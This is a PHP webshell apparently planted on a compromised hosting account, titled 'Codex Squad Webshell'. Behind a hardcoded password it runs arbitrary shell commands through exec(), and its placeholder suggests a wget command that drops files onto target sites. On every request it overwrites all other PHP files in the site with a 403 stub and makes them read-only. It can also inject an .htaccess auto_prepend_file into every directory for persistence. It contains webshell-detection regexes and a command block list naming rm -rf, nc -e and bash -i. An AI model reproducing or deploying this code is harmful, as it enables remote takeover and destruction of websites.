File: /home/puthuppa/public_html/0xC0D3X.php
<?php
// ============= SUPER MOD SECURITY BY 0xC0D3X =============
$SESSION_TIMEOUT = 1800; // Session timeout in seconds (30 minutes)
session_start();
// Default password
$DEFAULT_PASSWORD = "GeoDevz69#";
$SECURITY_KEY = "0xC0D3X_" . md5($DEFAULT_PASSWORD);
// Get current script filename for protection
$current_script = basename(__FILE__);
// Check if user is logged in
$logged_in = isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
$key_valid = isset($_SESSION['security_key']) && $_SESSION['security_key'] === $SECURITY_KEY;
// Handle logout
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Handle login
if (isset($_POST['password']) && !$logged_in) {
if ($_POST['password'] === $DEFAULT_PASSWORD) {
$_SESSION['logged_in'] = true;
$_SESSION['security_key'] = $SECURITY_KEY;
$_SESSION['login_time'] = time();
$logged_in = true;
$key_valid = true;
} else {
$login_error = "Invalid password!";
}
}
// Handle GET KEY request
if (isset($_POST['get_key']) && isset($_POST['password'])) {
if ($_POST['password'] === $DEFAULT_PASSWORD) {
$key_display = $SECURITY_KEY;
} else {
$login_error = "Invalid password for key generation!";
}
}
// Check session timeout
if ($logged_in && (time() - $_SESSION['login_time']) > $SESSION_TIMEOUT) {
session_destroy();
$logged_in = false;
$key_valid = false;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// ============= GLOBAL PROTECTION SYSTEM =============
function isStrict0xC0D3XFile($filename) {
global $current_script;
// Always allow the current script itself
if ($filename === $current_script) {
return true;
}
// Allow index.php
if (strtolower($filename) === 'index.php') {
return true;
}
$file_lower = strtolower($filename);
// STRICT PATTERN: Must start with 0xc0d3x followed by underscore or dot
$strict_patterns = [
// Exact 0xC0D3X format with underscore
'/^0xc0d3x_[a-z0-9_\-]+\.(php|txt|log|html|htm)$/',
// Exact 0xC0D3X.php format
'/^0xc0d3x\.php$/',
// Codex Squad variations
'/^codex_[a-z0-9_\-]+\.(php|txt|log)$/',
'/^squad_[a-z0-9_\-]+\.(php|txt|log)$/',
];
foreach ($strict_patterns as $pattern) {
if (preg_match($pattern, $file_lower)) {
return true;
}
}
return false;
}
// ============= INSTANT BLOCKING PROTECTION =============
function installGlobalProtection() {
global $current_script;
$root_dir = dirname(__FILE__);
// Create .htaccess protection
$htaccess_content = <<<HTACCESS
# ============= 0xC0D3X GLOBAL PROTECTION =============
<FilesMatch "\.(php|phtml|phps|php3|php4|php5|php6|php7|php8|inc)$">
php_value auto_prepend_file "{$root_dir}/{$current_script}"
</FilesMatch>
# Block direct access to dangerous files
<Files ~ "\.(htaccess|htpasswd|ini|log|sh|bak|sql)$">
Order allow,deny
Deny from all
</Files>
HTACCESS;
// Install .htaccess in all directories
$dir_iterator = new RecursiveDirectoryIterator($root_dir, RecursiveDirectoryIterator::SKIP_DOTS);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if ($file->isDir()) {
$htaccess_file = $file->getPathname() . '/.htaccess';
@file_put_contents($htaccess_file, $htaccess_content);
}
}
// Also in root directory
@file_put_contents($root_dir . '/.htaccess', $htaccess_content);
}
// ============= INSTANT FILE ACCESS BLOCKER =============
function globalProtectionInterceptor() {
global $current_script;
// Get the actual executing script
if (isset($_SERVER['SCRIPT_FILENAME'])) {
$executing_script = basename($_SERVER['SCRIPT_FILENAME']);
} else {
$executing_script = basename($_SERVER['PHP_SELF']);
}
// Skip if it's our main script
if ($executing_script === $current_script) {
return;
}
// Check if file is NOT a 0xC0D3X file or index.php
if (!isStrict0xC0D3XFile($executing_script)) {
// INSTANTLY BLOCK THE FILE CONTENTS
$file_path = $_SERVER['SCRIPT_FILENAME'];
if (file_exists($file_path)) {
// Overwrite the file with blocking code
$blocked_content = "<?php\nheader('HTTP/1.1 403 Forbidden');\nheader('Content-Type: text/plain; charset=utf-8');\ndie('💢 Unauthorized Access Denied 💢');\n?>";
@file_put_contents($file_path, $blocked_content);
@chmod($file_path, 0444);
}
// INSTANT BLOCK WITH SIMPLE TEXT
header('HTTP/1.1 403 Forbidden');
header('Content-Type: text/plain; charset=utf-8');
die('💢 Unauthorized Access Denied 💢');
}
}
// ============= CONTINUOUS FILE MONITORING =============
function runContinuousFileProtection() {
global $current_script;
static $last_run = 0;
// Run at most once per second to prevent performance issues
if (time() - $last_run < 1) {
return 0;
}
$last_run = time();
$root_dir = dirname(__FILE__);
$blocked_count = 0;
// Get all PHP files
$php_extensions = ['php', 'phtml', 'phps', 'php3', 'php4', 'php5', 'php6', 'php7', 'php8', 'inc'];
// Scan current directory first (fastest)
$current_files = @scandir($root_dir);
if ($current_files) {
foreach ($current_files as $file) {
if ($file === '.' || $file === '..') continue;
$file_path = $root_dir . '/' . $file;
if (!is_file($file_path)) continue;
$extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if (in_array($extension, $php_extensions)) {
// Skip the current script itself
if ($file === $current_script) {
continue;
}
// Skip index.php
if (strtolower($file) === 'index.php') {
continue;
}
// Check if file is NOT a 0xC0D3X file
if (!isStrict0xC0D3XFile($file)) {
// Check if file is already blocked
$content = @file_get_contents($file_path, false, null, 0, 100);
$is_already_blocked = $content && (
strpos($content, '💢 Unauthorized Access Denied 💢') !== false ||
strpos($content, 'Blocked by 0xC0D3X') !== false
);
if (!$is_already_blocked) {
// INSTANTLY BLOCK THE FILE
$blocked_content = "<?php\nheader('HTTP/1.1 403 Forbidden');\nheader('Content-Type: text/plain; charset=utf-8');\ndie('💢 Unauthorized Access Denied 💢');\n?>";
@file_put_contents($file_path, $blocked_content);
@chmod($file_path, 0444);
$blocked_count++;
}
}
}
}
}
// Scan subdirectories (less frequent)
static $subdir_last_run = 0;
if (time() - $subdir_last_run > 30) { // Scan subdirectories every 30 seconds
$subdir_last_run = time();
$dir_iterator = new RecursiveDirectoryIterator($root_dir, RecursiveDirectoryIterator::SKIP_DOTS);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if ($file->isFile()) {
$file_path = $file->getPathname();
$filename = $file->getFilename();
$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
if (in_array($extension, $php_extensions)) {
// Skip the current script itself
if ($filename === $current_script) {
continue;
}
// Skip index.php
if (strtolower($filename) === 'index.php') {
continue;
}
// Check if file is NOT a 0xC0D3X file
if (!isStrict0xC0D3XFile($filename)) {
// Check if file is already blocked
$content = @file_get_contents($file_path, false, null, 0, 100);
$is_already_blocked = $content && (
strpos($content, '💢 Unauthorized Access Denied 💢') !== false ||
strpos($content, 'Blocked by 0xC0D3X') !== false
);
if (!$is_already_blocked) {
// INSTANTLY BLOCK THE FILE
$blocked_content = "<?php\nheader('HTTP/1.1 403 Forbidden');\nheader('Content-Type: text/plain; charset=utf-8');\ndie('💢 Unauthorized Access Denied 💢');\n?>";
@file_put_contents($file_path, $blocked_content);
@chmod($file_path, 0444);
$blocked_count++;
}
}
}
}
}
}
return $blocked_count;
}
// ============= ADVANCED WEBSHELL DETECTION & PROTECTION =============
function scanForWebshells() {
global $current_script;
$current_dir = dirname(__FILE__);
$webshell_patterns = [
'/eval\s*\(/i',
'/base64_decode\s*\(/i',
'/system\s*\(/i',
'/shell_exec\s*\(/i',
'/exec\s*\(/i',
'/passthru\s*\(/i',
'/popen\s*\(/i',
'/proc_open\s*\(/i',
'/assert\s*\(/i',
'/preg_replace\s*\(\s*["\']\/\.\*["\']/i',
'/create_function\s*\(/i',
'/\$_GET\s*\[\s*["\']\w+["\']\s*\]\s*\(\s*\$_/i',
'/\$_POST\s*\[\s*["\']\w+["\']\s*\]\s*\(\s*\$_/i',
'/\$_REQUEST\s*\[\s*["\']\w+[\'"]\s*\]\s*\(\s*\$_/i',
'/\$_COOKIE\s*\[\s*["\']\w+["\']\s*\]\s*\(\s*\$_/i',
'/gzuncompress\s*\(\s*base64_decode/i',
'/gzinflate\s*\(\s*base64_decode/i',
'/str_rot13\s*\(/i',
'/include\s*\(\s*\$_/i',
'/require\s*\(\s*\$_/i',
'/include_once\s*\(\s*\$_/i',
'/require_once\s*\(\s*\$_/i',
'/`.*`/',
'/<\?php\s+echo\s+\$_/i',
];
$dangerous_extensions = ['.php', '.phtml', '.phps', '.php5', '.php7', '.php4', '.inc', '.pl', '.cgi', '.py', '.sh'];
$webshells_found = [];
$dir_iterator = new RecursiveDirectoryIterator($current_dir, RecursiveDirectoryIterator::SKIP_DOTS);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if ($file->isFile()) {
$file_path = $file->getPathname();
$filename = $file->getFilename();
if ($filename === $current_script || strtolower($filename) === 'index.php') {
continue;
}
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
$full_ext = '.' . $ext;
if (in_array($full_ext, $dangerous_extensions)) {
$content = @file_get_contents($file_path);
if ($content) {
// Check if already blocked
if (strpos($content, '💢 Unauthorized Access Denied 💢') !== false ||
strpos($content, 'Blocked by 0xC0D3X') !== false) {
continue;
}
foreach ($webshell_patterns as $pattern) {
if (preg_match($pattern, $content)) {
$webshells_found[] = $file_path;
$neutralized_content = "<?php\n// ============= Blocked by 0xC0D3X =============\n";
$neutralized_content .= "echo 'ACCESS DENIED - This file has been Blocked by 0xC0D3X';\n";
$neutralized_content .= "exit;\n?>";
@file_put_contents($file_path, $neutralized_content);
@chmod($file_path, 0444);
break;
}
}
$suspicious_names = ['shell', 'backdoor', 'wso', 'c99', 'r57', 'b374k', 'c100', 'uploader', 'cmd', 'phpinfo', 'config'];
foreach ($suspicious_names as $name) {
if (stripos($filename, $name) !== false) {
$webshells_found[] = $file_path;
$neutralized_content = "<?php\n// ============= Blocked by 0xC0D3X =============\n";
$neutralized_content .= "echo 'ACCESS DENIED - This file has been Blocked by 0xC0D3X';\n";
$neutralized_content .= "exit;\n?>";
@file_put_contents($file_path, $neutralized_content);
@chmod($file_path, 0444);
break;
}
}
}
}
}
}
return $webshells_found;
}
// ============= MAIN PROTECTION EXECUTION =============
// This runs ALWAYS, even when not logged in
globalProtectionInterceptor();
// Run CONTINUOUS file protection on EVERY request
$blocked_files = runContinuousFileProtection();
// Install global protection if requested
if ($logged_in && isset($_GET['install'])) {
installGlobalProtection();
$install_success = true;
}
// Run webshell scan only when logged in
if ($logged_in) {
$detected_webshells = scanForWebshells();
} else {
$detected_webshells = [];
}
// Continue with the rest of your HTML/PHP code...
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>0xC0D3X Mobile</title>
<style>
/* MOBILE PORTRAIT ONLY UI */
* {
margin: 0;
padding: 0;
box-sizing: border-box;
-webkit-tap-highlight-color: transparent;
}
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif;
background: #f0f0f0;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
padding: 15px;
color: #333;
touch-action: manipulation;
overflow-x: hidden;
}
/* Force portrait orientation */
@media screen and (min-width: 600px) {
body::before {
content: "Please rotate your device to portrait mode";
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: #f0f0f0;
display: flex;
justify-content: center;
align-items: center;
font-size: 20px;
font-weight: bold;
color: #333;
text-align: center;
padding: 20px;
z-index: 9999;
}
}
.neumorphic-container {
background: #f0f0f0;
border-radius: 20px;
padding: 15px;
box-shadow:
12px 12px 24px #d9d9d9,
-12px -12px 24px #ffffff;
width: 100%;
max-width: 100%;
border: 1px solid rgba(255, 255, 255, 0.5);
position: relative;
overflow: hidden;
margin: auto;
}
.neumorphic-container::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
height: 3px;
background: linear-gradient(90deg, #f0f0f0, rgba(0,0,0,0.1), #f0f0f0);
}
.header {
text-align: center;
margin-bottom: 20px;
padding-bottom: 15px;
border-bottom: 2px solid rgba(0, 0, 0, 0.08);
}
.title {
color: #333;
font-size: 1.5em;
font-weight: 900;
letter-spacing: 0.5px;
margin-bottom: 5px;
text-transform: uppercase;
}
.subtitle {
color: #666;
font-size: 0.85em;
font-weight: 400;
letter-spacing: 0.3px;
}
.login-container, .command-interface {
background: #f0f0f0;
border-radius: 15px;
padding: 15px;
margin-bottom: 15px;
box-shadow:
inset 4px 4px 8px #e0e0e0,
inset -4px -4px 8px #ffffff;
border: 1px solid rgba(255, 255, 255, 0.5);
}
.form-group {
margin-bottom: 15px;
}
.form-label {
display: block;
margin-bottom: 8px;
color: #333;
font-weight: 700;
font-size: 0.95em;
text-transform: uppercase;
letter-spacing: 0.5px;
}
.form-input, .command-input {
width: 100%;
padding: 12px 15px;
border: none;
border-radius: 12px;
background: #f0f0f0;
box-shadow:
inset 4px 4px 8px #e0e0e0,
inset -4px -4px 8px #ffffff;
font-size: 1em;
color: #333;
transition: all 0.2s ease;
-webkit-appearance: none;
appearance: none;
font-family: inherit;
}
.form-input:focus, .command-input:focus {
outline: none;
box-shadow:
inset 3px 3px 6px #e0e0e0,
inset -3px -3px 6px #ffffff;
}
.button-group {
display: flex;
flex-direction: column;
gap: 10px;
width: 100%;
}
.row-buttons {
display: flex;
gap: 10px;
width: 100%;
}
.neumorphic-button {
flex: 1;
padding: 14px 10px;
border: none;
border-radius: 12px;
font-size: 0.95em;
font-weight: 700;
cursor: pointer;
transition: all 0.2s ease;
text-transform: uppercase;
letter-spacing: 0.8px;
background: #f0f0f0;
color: #333;
box-shadow:
6px 6px 12px #e0e0e0,
-6px -6px 12px #ffffff;
position: relative;
overflow: hidden;
min-height: 50px;
display: flex;
align-items: center;
justify-content: center;
user-select: none;
text-align: center;
}
.neumorphic-button::after {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: rgba(255, 255, 255, 0.1);
opacity: 0;
transition: opacity 0.2s;
}
.neumorphic-button:active::after {
opacity: 1;
}
.neumorphic-button:active {
transform: translateY(1px);
box-shadow:
inset 3px 3px 6px #e0e0e0,
inset -3px -3px 6px #ffffff;
}
.alert {
padding: 12px;
border-radius: 12px;
margin-bottom: 15px;
text-align: center;
font-weight: 700;
text-transform: uppercase;
letter-spacing: 0.5px;
box-shadow:
6px 6px 12px #e0e0e0,
-6px -6px 12px #ffffff;
border: 1px solid rgba(255, 255, 255, 0.5);
font-size: 0.9em;
}
.alert-danger {
background: #f0f0f0;
color: #ff4444;
border-color: rgba(255, 68, 68, 0.3);
}
.alert-success {
background: #f0f0f0;
color: #00aa00;
border-color: rgba(0, 170, 0, 0.3);
}
.alert-info {
background: #f0f0f0;
color: #0066cc;
border-color: rgba(0, 102, 204, 0.3);
}
.key-display {
background: #f0f0f0;
border-radius: 12px;
padding: 12px;
margin-top: 15px;
font-family: 'Courier New', monospace;
word-break: break-all;
box-shadow:
inset 3px 3px 6px #e0e0e0,
inset -3px -3px 6px #ffffff;
border: 1px solid rgba(255, 255, 255, 0.5);
font-size: 0.85em;
}
.command-form {
margin-bottom: 15px;
}
.output-container {
background: #1a1a1a;
border-radius: 12px;
padding: 15px;
margin-top: 15px;
max-height: 300px;
overflow-y: auto;
box-shadow:
inset 3px 3px 6px #000000,
inset -3px -3px 6px #333333;
border: 1px solid #333;
-webkit-overflow-scrolling: touch;
}
pre {
color: #00ff00;
font-family: 'Courier New', monospace;
font-size: 0.85em;
line-height: 1.4;
white-space: pre-wrap;
word-wrap: break-word;
}
.info-panel {
display: grid;
grid-template-columns: repeat(2, 1fr);
gap: 10px;
margin-top: 15px;
padding-top: 15px;
border-top: 2px solid rgba(0, 0, 0, 0.08);
}
.info-box {
background: #f0f0f0;
border-radius: 12px;
padding: 12px;
text-align: center;
box-shadow:
4px 4px 8px #e0e0e0,
-4px -4px 8px #ffffff;
transition: all 0.2s ease;
border: 1px solid rgba(255, 255, 255, 0.5);
}
.info-box:active {
transform: translateY(1px);
box-shadow:
inset 3px 3px 6px #e0e0e0,
inset -3px -3px 6px #ffffff;
}
.info-label {
font-size: 0.75em;
color: #666;
margin-bottom: 5px;
font-weight: 600;
text-transform: uppercase;
letter-spacing: 0.5px;
}
.info-value {
font-size: 1em;
font-weight: 800;
color: #333;
}
.footer {
text-align: center;
margin-top: 15px;
padding-top: 15px;
border-top: 2px solid rgba(0, 0, 0, 0.08);
color: #666;
font-size: 0.75em;
line-height: 1.4;
}
.install-button {
width: 100%;
margin-top: 10px;
}
/* Mobile optimizations */
@media (max-width: 360px) {
.title {
font-size: 1.3em;
}
.neumorphic-container {
padding: 10px;
border-radius: 15px;
}
.login-container, .command-interface {
padding: 12px;
border-radius: 12px;
}
.neumorphic-button {
padding: 12px 8px;
font-size: 0.9em;
min-height: 45px;
}
.info-panel {
grid-template-columns: 1fr;
gap: 8px;
}
.form-input, .command-input {
padding: 10px 12px;
font-size: 0.95em;
}
}
/* Prevent landscape mode */
@media (orientation: landscape) {
body::before {
content: "Please rotate your device to portrait mode for best experience";
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: #f0f0f0;
display: flex;
justify-content: center;
align-items: center;
font-size: 18px;
font-weight: bold;
color: #333;
text-align: center;
padding: 20px;
z-index: 9999;
}
.neumorphic-container {
opacity: 0.3;
pointer-events: none;
}
}
/* Touch optimizations */
.neumorphic-button {
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
input, textarea, button {
font-size: 16px; /* Prevent zoom on iOS */
}
/* Hide scrollbars but keep functionality */
.output-container::-webkit-scrollbar {
width: 4px;
}
.output-container::-webkit-scrollbar-track {
background: #1a1a1a;
}
.output-container::-webkit-scrollbar-thumb {
background: #00ff00;
border-radius: 2px;
}
/* Button styling for specific buttons */
.get-key-btn {
order: 1;
}
.login-btn {
order: 2;
}
.execute-btn {
order: 1;
}
.logout-btn {
order: 2;
}
/* Ensure all content fits portrait */
@media (max-height: 700px) {
.neumorphic-container {
padding: 10px;
margin: 5px;
}
.header {
margin-bottom: 10px;
}
.login-container, .command-interface {
margin-bottom: 10px;
}
.output-container {
max-height: 200px;
}
}
@media (max-height: 600px) {
.output-container {
max-height: 150px;
}
.info-panel {
margin-top: 10px;
padding-top: 10px;
}
}
</style>
</head>
<body>
<div class="neumorphic-container">
<div class="header">
<h4 class="title">CODEX SQUAD WEBSHELL</h4>
<p class="subtitle">SECURITY IS JUST AN ILLUSION</p>
</div>
<?php if (!$logged_in || !$key_valid): ?>
<!-- Login Form -->
<div class="login-container">
<?php if (isset($login_error)): ?>
<div class="alert alert-danger">
<?php echo htmlspecialchars($login_error); ?>
</div>
<?php endif; ?>
<?php if (isset($key_display)): ?>
<div class="alert alert-success">
SECURITY KEY GENERATED
</div>
<div class="key-display">
<strong>SECURITY KEY:</strong><br>
<?php echo htmlspecialchars($key_display); ?>
</div>
<?php endif; ?>
<form method="POST" action="">
<div class="form-group">
<label class="form-label" for="password">AUTHORIZED ACCESS ONLY</label>
<input type="password"
id="password"
name="password"
class="form-input"
placeholder="ENTER PASSWORD"
required>
</div>
<div class="button-group">
<div class="row-buttons">
<!-- GET KEY on LEFT, LOGIN on RIGHT -->
<button type="submit" name="get_key" class="neumorphic-button get-key-btn">
GET KEY
</button>
<button type="submit" name="login" class="neumorphic-button login-btn">
LOGIN
</button>
</div>
</div>
</form>
</div>
<?php else: ?>
<!-- Protection Status -->
<?php if (isset($install_success)): ?>
<div class="alert alert-success">
GLOBAL PROTECTION INSTALLED
</div>
<?php endif; ?>
<?php if ($blocked_files > 0): ?>
<div class="alert alert-info">
<?php echo $blocked_files; ?> FILES BLOCKED
</div>
<?php endif; ?>
<?php if (!empty($detected_webshells)): ?>
<div class="alert alert-danger">
<?php echo count($detected_webshells); ?> WEBSHELLS NEUTRALIZED
</div>
<?php endif; ?>
<!-- Install Global Protection -->
<div style="margin-bottom: 15px;">
<a href="?install=1" class="neumorphic-button install-button">
[ ACTIVATE PROTECTION ]
</a>
</div>
<div class="command-interface">
<div class="command-form">
<div class="form-group">
<label class="form-label" for="cmd">
ENTER COMMAND TERMINAL
</label>
<input type="text"
name="cmd"
id="cmd"
class="command-input"
placeholder="ENTER COMMAND HERE ( pwd, ls -la, wget -O /home/usr/domains/target_site.com/filename.html https://pastebin/raw/examplehere )"
autofocus
value="<?php echo isset($_GET['cmd']) ? htmlspecialchars($_GET['cmd']) : ''; ?>">
</div>
<div class="button-group">
<div class="row-buttons">
<!-- EXECUTE on LEFT, LOGOUT on RIGHT -->
<button type="submit" form="cmdForm" class="neumorphic-button execute-btn">
EXECUTE
</button>
<a href="?logout=true" class="neumorphic-button logout-btn">
LOGOUT
</a>
</div>
</div>
</div>
<form method="GET" id="cmdForm" style="display: none;">
<input type="hidden" name="cmd" id="cmdHidden">
</form>
<?php if (isset($_GET['cmd'])): ?>
<div class="output-container">
<pre>
<?php
$command = trim($_GET['cmd']);
if (!empty($command)) {
$script_name = $current_script;
$dangerous_patterns = [
'/^rm\s+.*\*.*$/', '/^rm\s+.*\.$/', '/^rm\s+-rf.*$/', '/^rm\s+-r.*$/', '/^rm\s+-f.*$/',
'/^find\s+.*-delete.*$/', '/^find\s+.*-exec\s+rm.*$/',
"/rm.*" . preg_quote($script_name, '/') . "/i",
"/unlink.*" . preg_quote($script_name, '/') . "/i",
"/delete.*" . preg_quote($script_name, '/') . "/i",
'/wget\s+.*\.(php|sh|pl|py|cgi)/i',
'/curl\s+.*\.(php|sh|pl|py|cgi)/i',
'/php\s+-r\s+/i',
'/echo\s+.*<\?php/i',
'/cat\s+.*>\s*.*\.php/i',
'/nc\s+.*-e\s+/i',
'/bash\s+-i\s+>/',
];
$blocked = false;
foreach ($dangerous_patterns as $pattern) {
if (preg_match($pattern, $command)) {
$blocked = true;
break;
}
}
if (!$blocked && strlen($command) > 200) {
$blocked = true;
}
if ($blocked) {
echo "COMMAND BLOCKED\n";
} else {
$output = [];
$return_var = 0;
set_time_limit(6);
exec($command . ' 2>&1', $output, $return_var);
foreach ($output as $line) {
echo htmlspecialchars($line) . "\n";
}
// Run blocking again after command execution
$new_blocked = runContinuousFileProtection();
if ($new_blocked > 0) {
echo "\n0xC0D3X: $new_blocked FILE(S) BLOCKED\n";
}
}
}
?>
</pre>
</div>
<?php endif; ?>
</div>
<div class="info-panel">
<div class="info-box">
<div class="info-label">STATUS</div>
<div class="info-value">ACTIVE</div>
</div>
<div class="info-box">
<div class="info-label">FILES</div>
<div class="info-value"><?php echo $blocked_files; ?></div>
</div>
<div class="info-box">
<div class="info-label">WEBSHELLS</div>
<div class="info-value"><?php echo count($detected_webshells); ?></div>
</div>
<div class="info-box">
<div class="info-label">ACCESS</div>
<div class="info-value">STRICT</div>
</div>
</div>
<div class="footer">
<p>Fast | Secured | Reliable System</p>
<p>All Rights Reserved Codex Squad Penetrators - 2024</p>
</div>
<?php endif; ?>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
const cmdInput = document.getElementById('cmd');
const cmdHidden = document.getElementById('cmdHidden');
const cmdForm = document.getElementById('cmdForm');
if (cmdInput && cmdForm) {
cmdInput.addEventListener('input', function() {
cmdHidden.value = this.value;
});
const executeButton = document.querySelector('button[form="cmdForm"]');
if (executeButton) {
executeButton.addEventListener('click', function(e) {
e.preventDefault();
cmdHidden.value = cmdInput.value;
cmdForm.submit();
});
}
cmdInput.addEventListener('keypress', function(e) {
if (e.key === 'Enter') {
e.preventDefault();
cmdHidden.value = this.value;
cmdForm.submit();
}
});
}
// Mobile optimizations
document.addEventListener('touchstart', function() {}, {passive: true});
document.addEventListener('touchmove', function() {}, {passive: true});
// Prevent zoom on double-tap
let lastTouchEnd = 0;
document.addEventListener('touchend', function(event) {
const now = Date.now();
if (now - lastTouchEnd <= 300) {
event.preventDefault();
}
lastTouchEnd = now;
}, false);
// Auto-focus command input on mobile
if (cmdInput && window.innerWidth < 768) {
setTimeout(() => {
cmdInput.focus();
}, 300);
}
// Force portrait mode
function forcePortrait() {
if (window.innerWidth > window.innerHeight) {
const message = document.createElement('div');
message.innerHTML = 'Please rotate your device to portrait mode';
message.style.cssText = `
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background: #f0f0f0;
display: flex;
justify-content: center;
align-items: center;
font-size: 18px;
font-weight: bold;
color: #333;
text-align: center;
padding: 20px;
z-index: 9999;
`;
if (!document.body.querySelector('div[style*="portrait mode"]')) {
document.body.appendChild(message);
}
}
}
forcePortrait();
window.addEventListener('resize', forcePortrait);
window.addEventListener('orientationchange', forcePortrait);
// Adjust layout for different screen heights
function adjustLayout() {
const container = document.querySelector('.neumorphic-container');
const bodyHeight = window.innerHeight;
if (container) {
if (bodyHeight < 600) {
container.style.padding = '8px';
container.style.margin = '5px 0';
} else {
container.style.padding = '15px';
container.style.margin = 'auto';
}
}
}
adjustLayout();
window.addEventListener('resize', adjustLayout);
});
</script>
</body>
</html>